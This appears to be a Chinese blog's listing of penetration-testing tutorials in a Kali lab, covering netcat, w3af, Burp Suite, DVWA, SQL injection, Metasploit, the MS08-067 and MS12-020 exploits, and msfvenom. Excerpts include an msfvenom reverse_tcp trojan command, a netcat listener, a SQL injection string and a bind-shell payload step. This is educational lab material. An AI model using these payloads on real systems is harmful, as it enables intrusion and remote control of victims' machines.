kali
Louisnie
疲惫生活中的英雄梦想
展开
-
Netcat,Wireshark,Tcpdump简介与使用
Netcat,TcpdumpNETCAT—NC 1. 网络工具中的瑞士军刀—小身材,大智慧 2. 侦听模式/传统模式 3. telnet/获取banner信息,nc使用telnet远程连接, 命令为:nc –nv 目标地址 目标端口 4. 传输文本信息(默认不加密): 例:A:nc –l –p 4444 作为服务端 -l表示打开监听模式,打开某个端口...原创 2018-08-27 21:20:15 · 849 阅读 · 0 评论 -
W3af---命令行模式实验详解(一)
实验环境: Kali:192.168.128.128 Metasploitable:192.168.128.129安装W3af:kali2.0安装w3af文档 w3af用户接口: console命令行接口 Gui图形界面化接口 API进入w3af命令行界面:root@kali:~/w3af-master# ./w3af_console w3a...原创 2018-09-10 22:46:35 · 8623 阅读 · 0 评论 -
Windows下轻松搭建DVWA测试环境
DVWA是一款基于php&mysql编写的用于常规WEB漏洞教学和检测的web脆弱性测试web应用。其中包含了SQL注入,盲注,文件包含,XSS,CSRF等一些常见的WEB漏洞,对于我们进行Web渗透提供了很好的平台。开始搭建:1,首先去下载phpstudy和DVWA源码PHPstduy:http://www.phpstudy.net/phpstudy/phpStudy2016110...原创 2018-09-18 15:03:21 · 17235 阅读 · 3 评论 -
零基础学习Burpsuite之代理功能
Burp Suite是一个用于测试Web应用程序安全性的图形工具。该工具使用Java编写,由PortSwigger Security开发。该工具有两个版本。可免费下载的免费版(免费版)和试用期后可购买的完整版(专业版)。免费版本功能显着降低。它的开发旨在为Web应用程序安全检查提供全面的解决方案。除了基本功能,如代理服务器,扫描仪和入侵者,该工具还包含更多高级选项,如蜘蛛,转发器,解码器,比较器...原创 2018-09-18 21:27:24 · 7862 阅读 · 0 评论 -
Burpsuite之Spider模块
Burp spider用来映射Web应用程序,他会自动抓取Web应用程序的链接,自动提交它发现的所有登陆表单,从而详细的分析整个应用程序,这些链接会传递给Burp Scanner进行详细的扫描.环境:kali:192.168.128.128/24metasploit:192.168.128.129/241,首先设置登陆的表单信息设置,由于在dvwa中默认用户名为admin,密码为passwr...原创 2018-09-24 23:22:31 · 1949 阅读 · 1 评论 -
零基础学习Burpsuite之目标(Target)工具
零基础学习Burpsuite(一)Burpsuite中的Target工具:我们在前一章使用Burpsuite作为代理可以得到目标访问web服务器的HTTP请求包既保存在Proxy工具中的HTTP history中,也保存在Target中在Target工具中,颜色是深色的URL表示已经真正发送过请求的地址,浅色的URL表示在请求的页面里所存在的其他URL地址,但没有访问过如果只想查看某个网站的...原创 2018-09-20 02:05:19 · 907 阅读 · 0 评论 -
SQL手工注入探索旅程(二)
SQL手工注入探索旅程(一)实验环境:kali:192.168.128.128/24metasploitable:192.168.128.129/24首先我们将metasploitable中的dvwa安全等级设置为low原创 2018-10-02 02:14:52 · 662 阅读 · 0 评论 -
Metasploit初探索
渗透测试者的困扰:需要掌握数百个工具软件,上千条命令参数,很难去全部记住.对于新出现的漏洞PoC/EXP有不同的运行环境要求,准备工 作繁琐.渗透工作者大部分时间都在学习不同工具的使用习惯,如果可以统一那么就方便的多.Metasploit简介:目前最流行,最强大,最具有扩展性的渗透测试平台软件基于Metasploit进行渗透测试和漏洞分析的流程和方法2003年由HD More发布第...原创 2018-10-12 16:58:57 · 707 阅读 · 0 评论 -
手动挖掘之默认安装漏洞
phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。其安装在Web服务器上的接口界面,主要用于使用php来管理安装服务器上的后台数据库(MySQL数据库),但如果采用默认安装,敏感路径未做出处理,便会存在安全漏洞,最突出的是其setup脚本中存在着服务器端请求伪造漏洞。远...原创 2018-09-28 17:04:03 · 615 阅读 · 0 评论 -
SQL手工注入探索旅程(一)
SQL注入漏洞原理由于程序没有过滤用户的输入,攻击者通过向服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始的SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句实验环境:kali:192.168.128.128/24metasploit:192.168.128.129/24我们首先看一段很简单的PHP代码查询数据...原创 2018-09-30 17:29:45 · 9315 阅读 · 0 评论 -
SQL手工注入探索旅程(三)
SQL手工注入探索旅程(一)SQL手工注入探索旅程(一)当无权读取information_schema库或者被拒绝union,order by这些语句通过试验去猜测数据库信息进而总结归纳出结果设置dvwa安全等级为low| 我们在输入框中输入 一下指令:' union select null,user()-- #使用MySQL数据库的user()函数查看当前使用者 得知是r...原创 2018-10-09 16:15:14 · 273 阅读 · 0 评论 -
WEB扫描工具之Nikto实践
实验环境:kali:192.168.136.128/24 Metasploitable:192.168.136.129/24 WEB扫描工具 Web扫描工具大部分都支持两种扫描模式:代理截断模式和主动扫描模式 Nikto:是一个Web服务器扫描程序,主要是去检查软件版本信息,搜索存在的安全隐患的文件,服务器配置漏洞,Web Application层面的安...原创 2018-09-07 01:28:13 · 7178 阅读 · 0 评论 -
Web侦察之Httrack的实践操作
WEB侦察之Httrack 实验环境:kali:192.168.136.128/24 Metasploitable:192.168.136.129/24 Httract简介:HTTrack Website Copier是一个免费并易于使用的线下浏览器工具,它能够让你从互联网上下载整个网站进行线下浏览.浏览线下站点和线上并没有什么不同.HTTrack同样可以进...原创 2018-09-07 01:21:54 · 6200 阅读 · 0 评论 -
kali2.0下简介及安装W3af(亲试有效)
简介: w3af是一个Web应用程序攻击和审计框架,旨在识别和利用所有Web应用程序漏洞。该包为框架提供了图形用户界面(GUI)。如果只需要命令行应用程序,请安装w3af-console。该框架被称为“网络的metasploit”,但它实际上远不止于此,因为它还使用黑盒扫描技术发现了Web应用程序漏洞!w3af核心及其插件完全用Python编写。该项目有130多个插件,可识别和利用SQL注入,跨...原创 2018-09-09 12:32:35 · 4899 阅读 · 0 评论 -
渗透测试之被动信息收集
被动信息收集:不与目标直接交互 1,公开渠道可获得的信息 2,与目标系统不产生交往 信息收集内容:IP地址段/域名信息/邮件地址/文档图片数据/公司地址/公司组织架构/联系电话,传真号码/人员姓名,职务/目标系统使用的技术架构/公开的商务信息 信息用途:用信息描述目标/发现/社会工程学/物理缺口 信息收集—DNS 域名解析成IP地址 域名与FQ...原创 2018-08-27 21:28:13 · 1548 阅读 · 0 评论 -
渗透测试之端口扫描(二)
端口扫描:端口对应网络服务及应用端程序 服务端程序的漏洞通过端口攻入 发现开放的端口 更具体的攻击面 UDP端口扫描: 如果收到ICMP端口不可达,表示端口关闭 如果没有收到回包,则证明端口是开放的 和三层扫描IP刚好相反Scapy端口开发扫描 ,其命令为:sr1(IP(dst=”192.168....原创 2018-08-27 22:21:10 · 2545 阅读 · 0 评论 -
渗透测试之服务扫描
服务扫描:识别开放端口上运行的应用识别目标操作系统,Windows,Linux等扫描方法:Banner捕获:扫描端口,通过工具识别端口对应的服务,不准确,仅作参考服务识别:基于指纹信息判断操作系统识别SNMP分析:通过SNMP识别目标系统,SNMP通过系统内部信息进行探测,结果比较准确防火墙识别:识别边界防火墙,绕过防火墙Banner捕获:通过软件开发商,软件名称,...原创 2018-08-28 14:16:54 · 3037 阅读 · 0 评论 -
渗透测试之操作系统识别
利用TTL起始值判断操作系统,不同类型的操作系统都有默认的TTL值(简陋扫描,仅作参考)TTL起始值:Windows xp(及在此版本之前的windows) 128 (广域网中TTL为65-128)Linux/Unix64(广域网中TTL为1-64)某些Unix:255网关:255使用nmap识别操作系统:nmap -O 192.168.45.129 #参数-O表示扫描操作系...原创 2018-08-28 14:36:16 · 8064 阅读 · 1 评论 -
微软MS12-020漏洞渗透实验
MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,可导致BSOD(死亡蓝屏)远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未...原创 2018-08-29 12:56:01 · 7747 阅读 · 0 评论 -
微软ms08-067渗透实践
简单描述:MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的...原创 2018-08-29 20:28:41 · 5286 阅读 · 0 评论 -
Msfvenom制作Windows木马程序
Mefvenom简介: msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线开始制作: 1:生成木马程序:msfvenom -p windows/meterpreter/reverse_tcp lhost=自己的ip lport=端口号(越大越好,不能超过65535) ...原创 2018-08-29 20:49:07 · 4180 阅读 · 0 评论 -
Web扫描之Skipfish详解实践
简介: Skipfish,谷歌创建的Web应用程序安全扫描程序,是一种活跃的Web应用程序安全侦察工具。它通过执行递归爬网和基于字典的探针为目标站点准备交互式站点地图。然后使用许多活动(但希望无中断)安全检查的输出对结果映射进行注释。该工具生成的最终报告旨在作为专业Web应用程序安全评估的基础。主要特征:高速:纯C代码,高度优化的HTTP处理,最小的CPU占用空间 - 通过响应式目标轻松...原创 2018-09-08 18:04:15 · 4634 阅读 · 0 评论 -
kali2.0安装DVWA(亲测有效)
1,去官网下载DVWA源文件:DVWA 2,解压文件:unzip DVWA-master.zip3,将其移动到/var/www/html文件下,并且重命名为dvwa(重命名纯属为了登陆方便)mv DVWA-master /var/www/html 4,修改文件夹权限:chmod -R 755 dvwa5,启动apache2 和mysqlservi...原创 2018-09-04 01:17:24 · 5859 阅读 · 0 评论 -
谈谈Metasploit中payload模块
我们可以不利用漏洞,直接将payload发送给目标主机,诱使其点击,也可获取到目标主机的shell.msf > use payload/windows/shell_bind_tcp #使用该模块绑定(监听)本机的一个TCP连接端口msf payload(windows/shell_bind_tcp) > generate #通过generate生成16进值的payload,默...原创 2018-10-20 01:24:10 · 2863 阅读 · 0 评论